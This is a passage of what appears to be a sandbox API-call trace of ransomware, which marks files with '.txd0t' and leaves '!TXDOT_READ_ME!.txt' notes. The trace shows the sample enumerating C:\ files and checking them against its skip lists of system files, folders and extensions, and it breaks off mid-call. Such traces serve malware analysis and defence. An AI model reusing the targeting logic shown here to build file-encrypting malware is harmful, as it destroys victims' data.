psz2=" ransom ") returned 1 [0128.329] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.329] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.329] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.329] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.329] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.329] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.329] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.330] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.330] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.330] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0128.330] StrCmpW (psz1="GetCurrentOOBE.dll", psz2=".") returned 1 [0128.330] StrCmpW (psz1="GetCurrentOOBE.dll", psz2="..") returned 1 [0128.330] StrCpyNW (in: psz1=0x6874278, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0128.330] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0128.330] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="GetCurrentOOBE.dll", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" [0128.330] PathFindExtensionW (pszPath="GetCurrentOOBE.dll") returned=".dll" [0128.330] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.330] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="bootsect.bak") returned 1 [0128.330] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="iconcache.db") returned -1 [0128.330] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="thumbs.db") returned -1 [0128.330] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2=" ransomware ") returned 1 [0128.330] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2=" ransom ") returned 1 [0128.330] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="debug.txt") returned 1 [0128.330] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="boot.ini") returned 1 [0128.330] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="desktop.ini") returned 1 [0128.330] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="autorun.inf") returned 1 [0128.330] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="ntuser.dat") returned -1 [0128.330] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="ntldr") returned -1 [0128.330] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="ntdetect.com") returned -1 [0128.330] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="bootfont.bin") returned 1 [0128.330] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.330] PathFindExtensionW (pszPath="GetCurrentOOBE.dll") returned=".dll" [0128.330] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.330] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x57ed2a8a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x29c, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="GetCurrentRollback.ini.txd0t", cAlternateFileName="GETCUR~1.TXD")) returned 1 [0128.330] StrCmpW (psz1="GetCurrentRollback.ini.txd0t", psz2=".") returned 1 [0128.330] StrCmpW (psz1="GetCurrentRollback.ini.txd0t", psz2="..") returned 1 [0128.330] StrCpyNW (in: psz1=0x6874278, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0128.330] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0128.330] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="GetCurrentRollback.ini.txd0t", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.txd0t") returned="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.txd0t" [0128.330] PathFindExtensionW (pszPath="GetCurrentRollback.ini.txd0t") returned=".txd0t" [0128.330] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.330] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0128.330] StrCmpW (psz1="PartnerSetupComplete.cmd", psz2=".") returned 1 [0128.331] StrCmpW (psz1="PartnerSetupComplete.cmd", psz2="..") returned 1 [0128.331] StrCpyNW (in: psz1=0x6874278, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0128.331] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0128.331] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="PartnerSetupComplete.cmd", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" [0128.331] PathFindExtensionW (pszPath="PartnerSetupComplete.cmd") returned=".cmd" [0128.331] StrCmpW (psz1=".cmd", psz2=".txd0t") returned -1 [0128.331] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="bootsect.bak") returned 1 [0128.331] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="iconcache.db") returned 1 [0128.331] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="thumbs.db") returned -1 [0128.331] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2=" ransomware ") returned 1 [0128.331] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2=" ransom ") returned 1 [0128.331] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="debug.txt") returned 1 [0128.331] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="boot.ini") returned 1 [0128.331] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="desktop.ini") returned 1 [0128.331] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="autorun.inf") returned 1 [0128.331] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="ntuser.dat") returned 1 [0128.331] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="ntldr") returned 1 [0128.331] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="ntdetect.com") returned 1 [0128.331] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="bootfont.bin") returned 1 [0128.331] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.331] PathFindExtensionW (pszPath="PartnerSetupComplete.cmd") returned=".cmd" [0128.331] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".cmd") returned=".cmd|.url|.mui" [0128.331] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0128.331] StrCmpW (psz1="preoobe.cmd", psz2=".") returned 1 [0128.331] StrCmpW (psz1="preoobe.cmd", psz2="..") returned 1 [0128.331] StrCpyNW (in: psz1=0x6874278, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0128.331] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0128.331] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="preoobe.cmd", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" [0128.331] PathFindExtensionW (pszPath="preoobe.cmd") returned=".cmd" [0128.331] StrCmpW (psz1=".cmd", psz2=".txd0t") returned -1 [0128.331] StrCmpIW (psz1="preoobe.cmd", psz2="bootsect.bak") returned 1 [0128.331] StrCmpIW (psz1="preoobe.cmd", psz2="iconcache.db") returned 1 [0128.331] StrCmpIW (psz1="preoobe.cmd", psz2="thumbs.db") returned -1 [0128.331] StrCmpIW (psz1="preoobe.cmd", psz2=" ransomware ") returned 1 [0128.331] StrCmpIW (psz1="preoobe.cmd", psz2=" ransom ") returned 1 [0128.332] StrCmpIW (psz1="preoobe.cmd", psz2="debug.txt") returned 1 [0128.332] StrCmpIW (psz1="preoobe.cmd", psz2="boot.ini") returned 1 [0128.332] StrCmpIW (psz1="preoobe.cmd", psz2="desktop.ini") returned 1 [0128.332] StrCmpIW (psz1="preoobe.cmd", psz2="autorun.inf") returned 1 [0128.332] StrCmpIW (psz1="preoobe.cmd", psz2="ntuser.dat") returned 1 [0128.332] StrCmpIW (psz1="preoobe.cmd", psz2="ntldr") returned 1 [0128.332] StrCmpIW (psz1="preoobe.cmd", psz2="ntdetect.com") returned 1 [0128.332] StrCmpIW (psz1="preoobe.cmd", psz2="bootfont.bin") returned 1 [0128.332] StrCmpIW (psz1="preoobe.cmd", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.332] PathFindExtensionW (pszPath="preoobe.cmd") returned=".cmd" [0128.332] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".cmd") returned=".cmd|.url|.mui" [0128.332] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0128.332] StrCmpW (psz1="SetupComplete.cmd", psz2=".") returned 1 [0128.332] StrCmpW (psz1="SetupComplete.cmd", psz2="..") returned 1 [0128.332] StrCpyNW (in: psz1=0x6874278, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0128.332] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0128.332] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="SetupComplete.cmd", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" [0128.332] PathFindExtensionW (pszPath="SetupComplete.cmd") returned=".cmd" [0128.332] StrCmpW (psz1=".cmd", psz2=".txd0t") returned -1 [0128.332] StrCmpIW (psz1="SetupComplete.cmd", psz2="bootsect.bak") returned 1 [0128.332] StrCmpIW (psz1="SetupComplete.cmd", psz2="iconcache.db") returned 1 [0128.332] StrCmpIW (psz1="SetupComplete.cmd", psz2="thumbs.db") returned -1 [0128.332] StrCmpIW (psz1="SetupComplete.cmd", psz2=" ransomware ") returned 1 [0128.332] StrCmpIW (psz1="SetupComplete.cmd", psz2=" ransom ") returned 1 [0128.332] StrCmpIW (psz1="SetupComplete.cmd", psz2="debug.txt") returned 1 [0128.332] StrCmpIW (psz1="SetupComplete.cmd", psz2="boot.ini") returned 1 [0128.332] StrCmpIW (psz1="SetupComplete.cmd", psz2="desktop.ini") returned 1 [0128.332] StrCmpIW (psz1="SetupComplete.cmd", psz2="autorun.inf") returned 1 [0128.332] StrCmpIW (psz1="SetupComplete.cmd", psz2="ntuser.dat") returned 1 [0128.332] StrCmpIW (psz1="SetupComplete.cmd", psz2="ntldr") returned 1 [0128.332] StrCmpIW (psz1="SetupComplete.cmd", psz2="ntdetect.com") returned 1 [0128.332] StrCmpIW (psz1="SetupComplete.cmd", psz2="bootfont.bin") returned 1 [0128.332] StrCmpIW (psz1="SetupComplete.cmd", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.332] PathFindExtensionW (pszPath="SetupComplete.cmd") returned=".cmd" [0128.332] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".cmd") returned=".cmd|.url|.mui" [0128.333] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 0 [0128.333] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.333] GetProcessHeap () returned 0xe30000 [0128.333] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.333] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x57ed2a8a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x57ed2a8a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0128.333] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0128.333] GetProcessHeap () returned 0xe30000 [0128.333] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0128.333] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0128.333] StrCmpW (psz1="$Recycle.Bin", psz2=".") returned -1 [0128.333] StrCmpW (psz1="$Recycle.Bin", psz2="..") returned -1 [0128.333] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0128.333] StrCmpW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2=".") returned -1 [0128.333] StrCmpW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="..") returned -1 [0128.333] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0128.333] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0128.333] StrNCatW (in: psz1="C:\\", psz2="$WINRE_BACKUP_PARTITION.MARKER", cchMax=1030 | out: psz1="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned="C:\\$WINRE_BACKUP_PARTITION.MARKER" [0128.333] PathFindExtensionW (pszPath="$WINRE_BACKUP_PARTITION.MARKER") returned=".MARKER" [0128.333] StrCmpW (psz1=".MARKER", psz2=".txd0t") returned -1 [0128.333] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="bootsect.bak") returned -1 [0128.333] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="iconcache.db") returned -1 [0128.333] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="thumbs.db") returned -1 [0128.333] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2=" ransomware ") returned 1 [0128.333] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2=" ransom ") returned 1 [0128.333] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="debug.txt") returned -1 [0128.333] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="boot.ini") returned -1 [0128.333] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="desktop.ini") returned -1 [0128.333] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="autorun.inf") returned -1 [0128.333] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="ntuser.dat") returned -1 [0128.333] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="ntldr") returned -1 [0128.333] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="ntdetect.com") returned -1 [0128.334] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="bootfont.bin") returned -1 [0128.334] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.334] PathFindExtensionW (pszPath="$WINRE_BACKUP_PARTITION.MARKER") returned=".MARKER" [0128.334] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".MARKER") returned 0x0 [0128.334] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x599b1edc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x599b1edc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0128.334] StrCmpW (psz1="588bce7c90097ed212", psz2=".") returned 1 [0128.334] StrCmpW (psz1="588bce7c90097ed212", psz2="..") returned 1 [0128.334] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0128.334] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0128.334] StrNCatW (in: psz1="C:\\", psz2="588bce7c90097ed212", cchMax=1030 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\windows\\system32\\") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\windows\\system\\") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\appdata\\local\\") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\boot\\") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\perflogs\\") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\programdata\\") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\drivers\\") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\wsus\\") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="crypt_detect") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="cryptolocker") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="ransomware") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="C:\\WINDOWS") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.334] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="C:\\Program Files") returned 0x0 [0128.334] GetProcessHeap () returned 0xe30000 [0128.335] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xf0daf8 [0128.335] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.335] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\*", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\*") returned="C:\\588bce7c90097ed212\\*" [0128.335] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\*", lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x599b1edc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x599b1edc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0128.335] StrCmpW (psz1=".", psz2=".") returned 0 [0128.335] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x599b1edc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x599b1edc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.335] StrCmpW (psz1="..", psz2=".") returned 1 [0128.335] StrCmpW (psz1="..", psz2="..") returned 0 [0128.335] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58ef6ad6, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58ef6ad6, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58ef6ad6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.335] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.335] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.335] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.335] StrNCatW (in: psz1="C:\\588bce7c90097ed212", 